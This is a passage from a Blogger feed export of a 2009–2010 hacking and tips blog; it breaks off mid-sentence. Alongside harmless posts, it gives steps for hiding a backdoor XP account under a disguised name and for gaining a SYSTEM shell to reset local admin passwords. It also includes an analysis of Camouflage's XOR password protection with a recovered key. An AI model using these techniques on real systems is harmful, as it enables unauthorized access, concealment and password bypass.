style="text-align: center; font-weight: bold;"&gt;&lt;span style="font-size:130%;"&gt;&lt;a href="https://addons.mozilla.org/en-US/firefox/addon/2144/"&gt;Advance Dork&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://addons.mozilla.org/img/uploads/previews/thumbs/12/12930.png?modified=1174810301"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 200px; height: 68px;" src="https://addons.mozilla.org/img/uploads/previews/thumbs/12/12930.png?modified=1174810301" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;      This tool allows you to right click and quickly craft advanced google searches based on the information on the web page using google operators like intitle: site: etc. Good tool for digging into a site using google ;-) if your unfamiliar with all this I suggest you read a book called "Google Hacking for penetration testers"&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7020948317530945898-2659426731401809195?l=theunl33t.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7020948317530945898/posts/default/2659426731401809195'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7020948317530945898/posts/default/2659426731401809195'/><link rel='alternate' type='text/html' href='http://theunl33t.blogspot.com/2010/06/8-firefox-add-ons-to-help-manage-web.html' title='8 Firefox Add-ons to help manage the web'/><author><name>The Unl33t</name><uri>http://www.blogger.com/profile/17211285403285610915</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_mJgRowKkfO8/Sx1rna_mfxI/AAAAAAAAADM/xeeVOgHj1PE/S220/myself.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_mJgRowKkfO8/TA27UyXfyzI/AAAAAAAAAE4/EgeI14drVjo/s72-c/leetkey.bmp' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-7020948317530945898.post-3221820629875061364</id><published>2010-03-20T22:56:00.003-04:00</published><updated>2010-03-20T23:05:58.879-04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='computers'/><category scheme='http://www.blogger.com/atom/ns#' term='Fix'/><category scheme='http://www.blogger.com/atom/ns#' term='Linux'/><category scheme='http://www.blogger.com/atom/ns#' term='Tips and Tricks'/><category scheme='http://www.blogger.com/atom/ns#' term='No Sound'/><category scheme='http://www.blogger.com/atom/ns#' term='Troubleshooting'/><category scheme='http://www.blogger.com/atom/ns#' term='Flash'/><category scheme='http://www.blogger.com/atom/ns#' term='Ubuntu'/><title type='text'>Not getting Sound in flash in Ubuntu? Try this! Worked for me!</title><content type='html'>Found this at &lt;a href="http://ubuntuforums.org/showthread.php?t=204022"&gt;http://ubuntuforums.org/showthread.php?t=204022&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;This is awesome.Flash looks for /usr/lib/libesd.so.1 and expects /tmp/.esd/socket to exist. By using these 3 commands, you can create them and flash will work. you will have to restart firefox if that is what lead you here ;-)&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;the commands are as follows&lt;/span&gt;:&lt;br /&gt;&lt;span style="font-style: italic;"&gt;sudo ln -s /usr/lib/libesd.so.0 /usr/lib/libesd.so.1&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;sudo mkdir -p /tmp/.esd/&lt;/span&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;sudo touch /tmp/.esd/socket&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;This worked for me, so I share it with you in hopes it helps. Because now I can listen to the portal "Still alive" theme XD&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7020948317530945898-3221820629875061364?l=theunl33t.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7020948317530945898/posts/default/3221820629875061364'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7020948317530945898/posts/default/3221820629875061364'/><link rel='alternate' type='text/html' href='http://theunl33t.blogspot.com/2010/03/not-getting-sound-in-flash-in-ubuntu.html' title='Not getting Sound in flash in Ubuntu? Try this! Worked for me!'/><author><name>The Unl33t</name><uri>http://www.blogger.com/profile/17211285403285610915</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_mJgRowKkfO8/Sx1rna_mfxI/AAAAAAAAADM/xeeVOgHj1PE/S220/myself.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-7020948317530945898.post-3051985877929630660</id><published>2010-01-19T12:05:00.004-05:00</published><updated>2011-02-08T23:03:29.424-05:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='disable vibrant'/><category scheme='http://www.blogger.com/atom/ns#' term='computers'/><category scheme='http://www.blogger.com/atom/ns#' term='disabling vibrant'/><category scheme='http://www.blogger.com/atom/ns#' term='Tips and Tricks'/><category scheme='http://www.blogger.com/atom/ns#' term='IT'/><category scheme='http://www.blogger.com/atom/ns#' term='disable ads'/><category scheme='http://www.blogger.com/atom/ns#' term='Ubuntu'/><title type='text'>How to Disable Vibrant Ads.</title><content type='html'>On any browser with cookies enabled, click on the following link.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.vibrantmedia.com/whatisIntelliTXT.asp?ipid=7540&amp;amp;cc=us&amp;amp;server=business.msnbc.us.intellitxt.com"&gt;http://www.vibrantmedia.com/whatisIntelliTXT.asp?ipid=7540&amp;amp;cc=us&amp;amp;server=business.msnbc.us.intellitxt.com&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Click on the disable tab. Then Click the link to disable the ads and your done! How kind of them to leave it up to the user to choice to see the ads or not.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7020948317530945898-3051985877929630660?l=theunl33t.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7020948317530945898/posts/default/3051985877929630660'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7020948317530945898/posts/default/3051985877929630660'/><link rel='alternate' type='text/html' href='http://theunl33t.blogspot.com/2010/01/how-to-disable-vibrant-ads.html' title='How to Disable Vibrant Ads.'/><author><name>The Unl33t</name><uri>http://www.blogger.com/profile/17211285403285610915</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_mJgRowKkfO8/Sx1rna_mfxI/AAAAAAAAADM/xeeVOgHj1PE/S220/myself.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-7020948317530945898.post-7702800962005613388</id><published>2010-01-08T09:27:00.036-05:00</published><updated>2010-01-08T11:07:34.159-05:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='forensics'/><category scheme='http://www.blogger.com/atom/ns#' term='computers'/><category scheme='http://www.blogger.com/atom/ns#' term='IT'/><category scheme='http://www.blogger.com/atom/ns#' term='security'/><category scheme='http://www.blogger.com/atom/ns#' term='hacking'/><title type='text'>Creating hidden accounts on a XP Box</title><content type='html'>&lt;p&gt;Others want to log in to XP under your name?&lt;br /&gt;Need to have an account under the radar?&lt;br /&gt;&lt;br /&gt;Whatever the need, note it can be done!&lt;br /&gt;&lt;br /&gt;The problem is that user accounts always show up on the welcome screen on XP. Our goal is to hide them from there using a simple Windows registry tweak. This tweak requires an existing account, so use one thats already there or create a new one. I would recommend the later!&lt;br /&gt;&lt;br /&gt;Now go into the Registry (click on "start" &gt; "Run" and type "&lt;em&gt;&lt;strong&gt;Regedit&lt;/strong&gt;"&lt;/em&gt; (without quotes) and hit enter).&lt;br /&gt;&lt;br /&gt;Now go to:&lt;br /&gt;&lt;Font color=#999999&gt;&lt;b&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList&lt;/b&gt;&lt;/font&gt;&lt;br /&gt;&lt;br /&gt;Now right-click on the pane on the right and create a new DWORD. Make the name from "New Value #1" to the same as the AccountName you wish to hide. Example: if I wanted to hide an Account called &lt;em&gt;StealthyMoFo&lt;/em&gt;, the DWORD Name would be &lt;em&gt;StealthyMoFo&lt;/em&gt;.&lt;br /&gt;&lt;br /&gt;Now double-click on the name and set the data value:&lt;br /&gt;&lt;br /&gt;0 to hide it&lt;br /&gt;1 to make it visible &lt;/p&gt;&lt;p&gt;Now exit the registry and reboot the machine for this to take effect.&lt;br /&gt;&lt;br /&gt;To logon using this new account, when you see the welcome screen, hold down "ctrl+alt" and hit &lt;em&gt;delete&lt;/em&gt; twice. this should take you to a normal username\password prompt like Windows 2000. Enter the name and password of the hidden account to log on.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;Two Side Notes: &lt;ul&gt;&lt;li&gt;This can be used to also force the Administrator account to show up on the welcome screen as it does in safe mode. &lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;Your hidden account will still have a folder under Documents and Settings. So if someone see's it, they might suspect something. Try to use something that sounds like it might belong there like "&lt;em&gt;RemoteService&lt;/em&gt;" or "&lt;em&gt;DotNet&lt;/em&gt;" or "&lt;em&gt;Admin&lt;/em&gt;". Most people wouldn't rise an eyebrow as those would seem like normal application/User accounts.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7020948317530945898-7702800962005613388?l=theunl33t.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7020948317530945898/posts/default/7702800962005613388'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7020948317530945898/posts/default/7702800962005613388'/><link rel='alternate' type='text/html' href='http://theunl33t.blogspot.com/2010/01/creating-hidden-accounts-on-xp-box.html' title='Creating hidden accounts on a XP Box'/><author><name>The Unl33t</name><uri>http://www.blogger.com/profile/17211285403285610915</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_mJgRowKkfO8/Sx1rna_mfxI/AAAAAAAAADM/xeeVOgHj1PE/S220/myself.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-7020948317530945898.post-6301614791478435203</id><published>2010-01-04T14:37:00.023-05:00</published><updated>2010-01-19T12:22:33.392-05:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='computers'/><category scheme='http://www.blogger.com/atom/ns#' term='Tips and Tricks'/><category scheme='http://www.blogger.com/atom/ns#' term='IT'/><category scheme='http://www.blogger.com/atom/ns#' term='security'/><category scheme='http://www.blogger.com/atom/ns#' term='Learning Commandline'/><category scheme='http://www.blogger.com/atom/ns#' term='hacking'/><title type='text'>fun with Explorer.exe running under SYSTEM account.</title><content type='html'>&lt;div align="center"&gt;In windows xp it is possible to obtain an process of explorer.exe running as the SYSTEM account.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;u&gt;&lt;span style="color:#cc9933;"&gt;--==[ Obtaining Explorer.exe Running as SYSTEM ]==--&lt;/span&gt;&lt;/u&gt;&lt;/strong&gt; &lt;/div&gt;&lt;div align="center"&gt;&lt;br /&gt;To obtain our shell we will use the command line and the "at" command. Once you have the shell open type the following command:&lt;br /&gt;&lt;/div&gt;&lt;div align="center"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div align="center"&gt;&lt;em&gt;&lt;strong&gt;at {Time_in_military_format_plus_one_min} &lt;time_in_military_format_plus_one_min&gt;/interactive cmd.exe&lt;/strong&gt;&lt;/em&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;div align="center"&gt;&lt;strong&gt;&lt;u&gt;Example if time were 5:45 PM&lt;/u&gt;:&lt;/strong&gt;&lt;em&gt; at 17:46 /interactive cmd.exe&lt;/em&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;This will give us a command prompt in one min. The interesting thing about this command prompt is the title. The title should read something like "C:\windows\system32\svchost.exe". That allow is interesting! Check your taskmanager, This process of CMD.EXE will be running under the user SYSTEM!&lt;br /&gt;&lt;div align="left"&gt;&lt;/div&gt;&lt;div align="left"&gt;&lt;br&gt;With That being said, anything spawned via this shell should run under the context of the SYSTEM account. Try it out, run notepad.exe from under that shell and check your taskmanager.&lt;/div&gt;&lt;div align="left"&gt;&lt;/div&gt;&lt;div align="left"&gt;&lt;br&gt;Now it's time to get that Explorer Running under SYSTEM. Use the task manager to kill the process of explorer.exe that is running under your account and then run &lt;em&gt;&lt;span style="color:#333333;"&gt;explorer.exe&lt;/span&gt;&lt;/em&gt; in the command shell that is running as system, It's that easy!&lt;/div&gt;&lt;div align="left"&gt;&lt;/div&gt;&lt;div align="left"&gt;&lt;br&gt;With our Explorer running as SYSTEM anything that you launch with a double-click runs as SYSTEM as well. Now the fun starts. What to do? What to do?&lt;/div&gt;&lt;div align="left"&gt;&lt;/div&gt;&lt;div align="left"&gt;&lt;/div&gt;&lt;div align="left"&gt;&lt;/div&gt;&lt;div align="center"&gt;&lt;strong&gt;&lt;u&gt;&lt;span style="color:#cc9933;"&gt;&lt;br /&gt;--==[ Abusing Explorer.exe as SYSTEM ]==--&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/u&gt;&lt;/strong&gt;&lt;/div&gt;&lt;div align="center"&gt;&lt;/div&gt;&lt;div align="left"&gt;I'm sure there are more things then listed here. But here are the two I like ;-).&lt;/div&gt;&lt;div align="left"&gt;&lt;/div&gt;&lt;div align="left"&gt;&lt;br&gt;1) Ignore local file permissions. Even with a users Documents and Settings set as private, as SYSTEM you can still travel through it. I used to use this when looking through a hard drive that was pulled from another PC and the user needed files from under there documents and settings.&lt;/div&gt;&lt;div align="left"&gt;&lt;/div&gt;&lt;div align="left"&gt;&lt;br&gt;2) Change the password on a local account without knowing the old password! How cool is that! that includes local admin accounts!&lt;/div&gt;&lt;div align="left"&gt;&lt;/div&gt;&lt;div align="left"&gt;&lt;br&gt;Now have fun, figure out what else you can do with it and don't use this for anything illegal.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7020948317530945898-6301614791478435203?l=theunl33t.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7020948317530945898/posts/default/6301614791478435203'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7020948317530945898/posts/default/6301614791478435203'/><link rel='alternate' type='text/html' href='http://theunl33t.blogspot.com/2010/01/fun-with-explorerexe-running-under.html' title='fun with Explorer.exe running under SYSTEM account.'/><author><name>The Unl33t</name><uri>http://www.blogger.com/profile/17211285403285610915</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_mJgRowKkfO8/Sx1rna_mfxI/AAAAAAAAADM/xeeVOgHj1PE/S220/myself.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-7020948317530945898.post-9027669349999289811</id><published>2009-07-25T20:32:00.004-04:00</published><updated>2011-02-08T23:04:48.333-05:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='stegano'/><category scheme='http://www.blogger.com/atom/ns#' term='forensics'/><category scheme='http://www.blogger.com/atom/ns#' term='computers'/><category scheme='http://www.blogger.com/atom/ns#' term='cryptography'/><category scheme='http://www.blogger.com/atom/ns#' term='camouflage'/><category scheme='http://www.blogger.com/atom/ns#' term='decrypt'/><category scheme='http://www.blogger.com/atom/ns#' term='reverse engineering'/><category scheme='http://www.blogger.com/atom/ns#' term='IT'/><category scheme='http://www.blogger.com/atom/ns#' term='encryption'/><category scheme='http://www.blogger.com/atom/ns#' term='security'/><category scheme='http://www.blogger.com/atom/ns#' term='hacking'/><title type='text'>Analyzing And Cracking Camouflage</title><content type='html'>&lt;div style="text-align: center;"&gt;Personally Discovered through my experiments.&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Camouflage is what is known as a steganography program. A steganography program that works to hide data from people where they wouldn't be likely to look for it. Camouflage (which can be downloaded from their website &lt;a href="http://camouflage.unfiction.com/"&gt;here&lt;/a&gt;) is a program that will let you take a data file and hide it behind  another file. Sounds pretty cool right? But how secure is it? That's What we are here to find out.&lt;br /&gt;&lt;br /&gt;&lt;center&gt;First and Foremost. To follow along you will need a few tools:&lt;br /&gt;&lt;table&gt;   &lt;tbody&gt;&lt;tr&gt;&lt;td&gt;   &lt;ul&gt;&lt;li&gt;Camouflage - &lt;a href="http://camouflage.unfiction.com/"&gt;Download Here&lt;/a&gt;&lt;/li&gt;&lt;li&gt;A text editor&lt;/li&gt;&lt;li&gt;A good Hex Editor (I use &lt;a href="http://www.hexworkshop.com/"&gt;Hex Workshop&lt;/a&gt;)&lt;/li&gt;&lt;li&gt;a JPEG file&lt;/li&gt;&lt;li&gt;and a brain Probably wouldn't be bad either&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;  &lt;/tbody&gt;&lt;/table&gt; &lt;/center&gt;       Okay so lets study the behavior of this program. First we will create a text file with the text "This is a hidden Message to hide using Camo". Save it and call it &lt;i&gt;hidden.txt&lt;/i&gt;. Once you have done this grab an jpeg image. This image is clean and has nothing attached to it. It is 4.15 KB (4,259 bytes) at the moment. Feel free to download and use it.&lt;br /&gt;&lt;br /&gt;&lt;center&gt;      &lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 100px; height: 160px;" src="http://2.bp.blogspot.com/_mJgRowKkfO8/SmulElISoII/AAAAAAAAAAM/xibl1wj3S-M/s320/thcry.jpg" title="thcry.jpg original with no tampering" alt="thcry.jpg original with no tampering" /&gt;&lt;br /&gt;{Please Note: I didn't make this image and wish to give credit to it's creator. however I don't remember who that is or were i got this image {probably Deviant Art} from or even how long ago it was. If you are the artist who made this image PLEASE LET ME KNOW SO I CAN GIVE YOU THE CREDIT YOU SO RIGHTFULLY DESERVE}.&lt;br /&gt;&lt;/center&gt;&lt;br /&gt;Now after installing camouflage, hide the hidden.txt file behind our image. To do this, Right click on &lt;i&gt;hidden.txt&lt;/i&gt; and go to &lt;b&gt;"Camouflage"&lt;/b&gt;. The Program window will appear, click on &lt;b&gt;"next"&lt;/b&gt;. On the next screen browse to the image file and click &lt;b&gt;"next"&lt;/b&gt;. On this screen give it at new name(for study purposes I called mine &lt;i&gt;thcry-test.jpg&lt;/i&gt;). On the next part it ask for a password. I used &lt;i&gt;"test"&lt;/i&gt;. This is my new image.&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 100px; height: 160px;" src="http://1.bp.blogspot.com/_mJgRowKkfO8/Smuls_GUb2I/AAAAAAAAAAU/s8Ed-Wdfaas/s320/thcry-test.jpg" alt="thcry.jpg with hidden.txt behind it with the password test" title="thcry.jpg with hidden.txt behind it with the password test" /&gt;&lt;br /&gt;&lt;/center&gt;   Now We have a new image with data Hidden behind it. Visually, Nothing happened. However the size did increase quite a bit 5.03 KB (5,157 bytes). Our text file is only 43 bytes but our image &lt;u&gt;&lt;b&gt;INCREASED&lt;/b&gt;&lt;/u&gt; 898 btyes! Interesting, this means 856 btyes extra. So lets increase the text file by one byte with the same password and see what happens.&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 100px; height: 160px;" src="http://1.bp.blogspot.com/_mJgRowKkfO8/Smumu0iAZwI/AAAAAAAAAAs/9CBYjA9SXNk/s320/thcry-test-43.jpg" alt="thcry.jpg with hidden.txt at 43 bytes behind it with the password test" title="thcry.jpg with hidden.txt at 43 bytes behind it with the password test" /&gt;&lt;br /&gt;&lt;/center&gt;   The new image only increase one byte! which means that the extra 856 bytes must have been for the program to structor and encapsulate the data it wants to hide! What does this mean. It means we should be able to tweak some minor settings and reverse engineer that structor by watching what changes. Now, The main reason I used the JPEG is that the end of a jpeg always ends with hex bytes &lt;b&gt;&lt;span style="color:green;"&gt;0xFF 0xD9&lt;/span&gt;&lt;/b&gt;. Thats the way the file format works, and that is what image viewers look for to stop loading the image data. Now open the 3 images in a hex editor. The original ends with &lt;b&gt;&lt;span style="color:green;"&gt;0xFF 0xD9&lt;/span&gt;&lt;/b&gt;. The other two however are ending with with a ton of &lt;b&gt;&lt;span style="color:green;"&gt;0x20&lt;/span&gt;&lt;/b&gt;, which is an ASCII space (same as hitting space on your key board). After the 0xFF 0xD9, we have a small cluster of data before the large packets of spaces. All this data is different with the exception of a string &lt;b&gt;RIGHT AFTER&lt;/b&gt; the &lt;b&gt;&lt;span style="color:green;"&gt;0xFF 0XD9&lt;/span&gt;&lt;/b&gt; which is &lt;b&gt;&lt;span style="color:green;"&gt;0x20 0x00 0xE2 0x0B 0xCA 0x01 0xF8 0xB5 0xF5 0x01&lt;/span&gt;&lt;/b&gt;. So why did the rest change so much while this string stayed the same? It's some setting which camo must be able to decrypt or read without a user supplied data&lt;br /&gt;&lt;br /&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 279px;" src="http://4.bp.blogspot.com/_mJgRowKkfO8/SmumXL4eDUI/AAAAAAAAAAc/_t8yCGPslCs/s320/hex0.bmp" alt="Hex dump of thcry-test.jpg" title="Hex dump of thcry-test.jpg" /&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 270px;" src="http://3.bp.blogspot.com/_mJgRowKkfO8/SmumlKXdUyI/AAAAAAAAAAk/c_xFwP8taak/s320/hex1.bmp" alt="" id="BLOGGER_PHOTO_ID_5362562938682823458" title="Hex dump of thcry-test-43.jpg" border="0" /&gt;   Now it is time. Lets use the 42 byte text file again and lets create 5 new files using the passwords "A", "AA","AAA", "AAAA", "AAAAA". Here they are.&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;img style="cursor: pointer; width: 100px; height: 160px;" src="http://2.bp.blogspot.com/_mJgRowKkfO8/SmuqcWZn9mI/AAAAAAAAAB8/OIEQnktTQd4/s320/thcry-A.jpg" title="password = A" alt="password = A" /&gt;&lt;br /&gt;&lt;img style="cursor: pointer; width: 100px; height: 160px;" src="http://4.bp.blogspot.com/_mJgRowKkfO8/Smun0LNmIzI/AAAAAAAAABM/pLr4UvG1i6A/s320/thcry-AA.jpg" title="password = AA" alt="password = AA" /&gt;&lt;br /&gt;&lt;img style="cursor: pointer; width: 100px; height: 160px;" src="http://2.bp.blogspot.com/_mJgRowKkfO8/Smun0e2bvEI/AAAAAAAAABU/MXYb-XW2PFo/s320/thcry-AAA.jpg" title="password = AAA" alt="password = AAA" /&gt;&lt;br /&gt;&lt;img style="cursor: pointer; width: 100px; height: 160px;" src="http://1.bp.blogspot.com/_mJgRowKkfO8/Smun0rydkPI/AAAAAAAAABc/V5ItkRggbmc/s320/thcry-AAAA.jpg" title="password = AAAA" alt="password = AAAA" /&gt;&lt;br /&gt;&lt;img style="cursor: pointer; width: 100px; height: 160px;" src="http://3.bp.blogspot.com/_mJgRowKkfO8/Smun0gnz9PI/AAAAAAAAABk/NfP6kOMzakk/s320/thcry-AAAAA.jpg" title="password = AAAAA" alt="password = AAAAA" /&gt;&lt;br /&gt;&lt;/center&gt;&lt;br /&gt;After this, The string listed above remains static. But more interesting is there are other parts in the Hex &lt;b&gt;&lt;span style="color:green;"&gt;0x20&lt;/span&gt;&lt;/b&gt; that stay static as well. However most note able was at offset &lt;b&gt;&lt;span style="color:green;"&gt;0x00001309-0x00001313&lt;/span&gt;&lt;/b&gt;. This was static with data after it that changed... &lt;b&gt;&lt;u&gt;BUT WAS ALWAYS THE SAME LENGTH AS THE PASSWORD!&lt;/u&gt;&lt;/b&gt; Furthermore the password was a repeating character "A". Which this data is the same length but as it grows the data *&lt;b&gt;&lt;u&gt;wasn't&lt;/u&gt;&lt;/b&gt;* changing! If you are familar with XOR logic encryption, then you should already see this is what it looks like we're dealing with. If your not familar with XOR please take a &lt;a href="http://en.wikipedia.org/wiki/XOR_cipher"&gt;look at this&lt;/a&gt; or &lt;a href="http://www.tech-faq.com/xor-encryption.shtml"&gt;This link here&lt;/a&gt; berfore you continue!&lt;br /&gt;&lt;span style="text-decoration: underline;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_mJgRowKkfO8/Smu10bKIYXI/AAAAAAAAAC8/bekQdz6d8Qc/s1600-h/TableofA.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 116px;" src="http://3.bp.blogspot.com/_mJgRowKkfO8/Smu10bKIYXI/AAAAAAAAAC8/bekQdz6d8Qc/s320/TableofA.jpg" alt="Click for larger image" title="Click for larger image" id="BLOGGER_PHOTO_ID_5362579693562782066" border="0" /&gt;&lt;/a&gt;&lt;span style="text-decoration: underline;"&gt;&lt;br /&gt;&lt;/span&gt;   So a Weakness Exist in XOR since it is a reversable encryption. There are three parts to it. The PlainText, The Key, and the Cipher text. As long as you have two of the 3, you can XOR them to get the missing part. So we Know the AAAA plaintext; which converted from ASCII to hex an "A" is &lt;b&gt;&lt;span style="color:green;"&gt;0x41&lt;/span&gt;&lt;/b&gt;, and we know it's Cipher text. So we are missing the key. We can for a quick example try to &lt;b&gt;&lt;span style="color:Red;"&gt;XOR 0x41414141 by 0x43D43B63&lt;/span&gt;&lt;/b&gt; and should get a key, which should decrypt the "test" password as well. Microsoft actually provide Hex and XOR in the normal calculator that comes with windows under the Scientfic view.&lt;br /&gt;&lt;br /&gt;&lt;center&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_mJgRowKkfO8/Smuvx2Rx8qI/AAAAAAAAACU/XRuUrBFlY7c/s1600-h/calc.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 336px; height: 221px;" src="http://2.bp.blogspot.com/_mJgRowKkfO8/Smuvx2Rx8qI/AAAAAAAAACU/XRuUrBFlY7c/s320/calc.jpg" alt="" id="BLOGGER_PHOTO_ID_5362573052233249442" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_mJgRowKkfO8/Smuwbo7GGnI/AAAAAAAAACc/acHXi_uQwvo/s1600-h/XorTable.bmp"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 312px; height: 164px;" src="http://2.bp.blogspot.com/_mJgRowKkfO8/Smuwbo7GGnI/AAAAAAAAACc/acHXi_uQwvo/s320/XorTable.bmp" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/center&gt;   So with this said. I noticed the only part the same on the pic with "test" password was the location and 0x02 0x00 so that marks the beginning of the poorly protected password. Now all we would do is make a password of about 256 A's and we will have a key that should be capable of decrypting most passwords for it. At this point I assume you Know how it would work. So I will Skip the steps and present you with the key which is in hex:&lt;br /&gt;&lt;br /&gt;&lt;center&gt;  &lt;table style="width: 603px; height: 188px;"&gt;   &lt;tbody&gt;&lt;tr&gt;&lt;td&gt; &lt;span style="color: rgb(51, 51, 51);font-family:arial;" &gt;02957A220CA614E1E1CFBF65206F9EB399654A53FBF67554AD23CD7E9C29&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 51, 51);font-family:arial;" &gt;E7FCE2F94DD2424E06C0F89A1C623874240055DF41CB01A2B7F38F8ADDAC&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 51, 51);font-family:arial;" &gt;33836029F378243E7AEBD3E49D9D43944AC7456D2574EB0B98C97CFCC8BA&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 51, 51);font-family:arial;" &gt;326B00D3C5C29434AFB0E5957D2A84A45FE56E272ADB967E3E483946CF6F&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 51, 51);font-family:arial;" &gt;71AA3C319AA99E8F8973B339CA32D5F031597C022E8637F92B7E51F24181&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 51, 51);font-family:arial;" &gt;0CD46515F770D4199820BF20B85567CC81188C133C633C9211E45B1B0822&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 51, 51);font-family:arial;" &gt;604C4AC58AB3C575C3907AF2B2B6C8D0388AC286F0ACE9CA5C4E3E092978&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 51, 51);font-family:arial;" &gt;29995A84D5BA5ED5927A38FAD060ECF527BAEEB7DE9F9BDE65D47639769C&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 51, 51);font-family:arial;" &gt;DA688DA8A0A61ED9DB0F4DAB92CD71&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;  &lt;/tbody&gt;&lt;/table&gt; &lt;/center&gt;Know we know that it is weak to this key because 